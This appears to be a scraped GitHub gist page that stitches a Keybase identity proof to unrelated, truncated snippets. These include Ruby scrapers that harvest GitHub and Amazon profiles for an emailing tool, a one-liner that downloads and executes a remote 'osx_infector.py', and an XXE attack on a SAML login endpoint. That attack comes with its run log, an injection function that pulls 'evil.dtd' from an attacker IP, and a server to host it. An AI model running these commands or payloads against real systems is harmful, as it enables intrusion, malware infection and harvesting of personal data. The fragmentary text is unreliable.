I hereby claim:
- I am freedomcoder on github.
- I am ishikawa (https://keybase.io/ishikawa) on keybase.
- I have a public key whose fingerprint is 17F9 D8EA E46E 3DA6 4F27 BF98 E405 57DA 37FD EB4F
To claim this, I am signing this object:
#!/usr/bin/env ruby | |
require 'net/http' | |
require 'cgi' | |
class Github | |
GOOGLE = "www.google.com" | |
GITHUB = "www.github.com" | |
PORT = 80 | |
QUERY = "/cse?q=site:github.com++intitle:Profile&hl=en&cof=&num=100&filter=0&safe=off&start=" |
<subject>EMaily Test Email</subject> | |
<html> | |
<body> | |
<h1> Hello %%name%% </h1> | |
I'm testing this email: %%email%% | |
Regards, | |
EMaily |
#!/usr/bin/env ruby | |
require 'net/http' | |
require 'cgi' | |
class Amazon | |
GOOGLE = "www.google.com" | |
AMAZON = "www.amazon.com" | |
PORT = 80 | |
QUERY = "/cse?q=site:http://www.amazon.com/gp/pdp/profile/&hl=en&cof=&num=100&filter=0&safe=off&start=" |
package gocard | |
import ( | |
"fmt" | |
"io" | |
"crypto/md5" | |
"crypto/sha1" | |
"crypto/sha256" | |
"crypto/sha512" | |
) |
I hereby claim:
To claim this, I am signing this object:
for i in ~/.vim/bundle/*; do git -C $i pull; done |
python -c 'import urllib; exec(urllib.urlopen("https://gist.githubusercontent.com/secretsquirrel/2ba497786027472f98dd/raw/328ecf19bfacb7fe386c98543d6b7fa60c4ef2ce/osx_infector.py").read())' |
ruby XXETester.rb https://domain.com:4285/api/SsoAuthLoginResponse | |
Puma 2.14.0 starting… | |
* Min threads: 0, max threads: 16 | |
* Environment: development | |
* Listening on tcp://0.0.0.0:80 | |
== Sinatra (v1.4.6) has taken the stage on 80 for development with backup from Puma | |
Running XXE Payload against server https://domain.com:4285/api/SsoAuthLoginResponse | |
Running XXE Payload against server https://domain.com:4285/api/SsoAuthLoginResponse | |
RestClient.post “https://domain.com:4285/api/SsoAuthLoginResponse", 6263 byte(s) length, “Accept”=>”text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8", “Accept-Encoding”=>”gzip, deflate”, “Accept-encoding”=>”gzip, deflate, br”, “Accept-language”=>”en-US,en;q=0.5", “Connection”=>”close”, “Content-Length”=>”6263", “Upgrade-insecure-requests”=>”1", “User-agent”=>”Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:48.0) Gecko/20100101 Firefox/48.0" | |
RestClient.post “https://domain.com:4285/api/SsoAuthLoginResponse", “SAMLResponse=PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRG |
def saml_inject(text, ip) | |
text.gsub( | |
“<?xml version=\”1.0\” encoding=\”UTF-8\”?>”, | |
“<?xml version=\”1.0\” encoding=\”UTF-8\”?><!DOCTYPE root [ <!ENTITY % remote SYSTEM \”http://#{ip}/evil.dtd\"> %remote;]>” | |
) | |
end | |
def SAML_recode(a) | |
CGI.escape(Base64.encode64(a).strip) | |
end |
ruby -rsinatra -e’set :public_folder, “.”; set :port, 80; set :bind, “0.0.0.0”’ |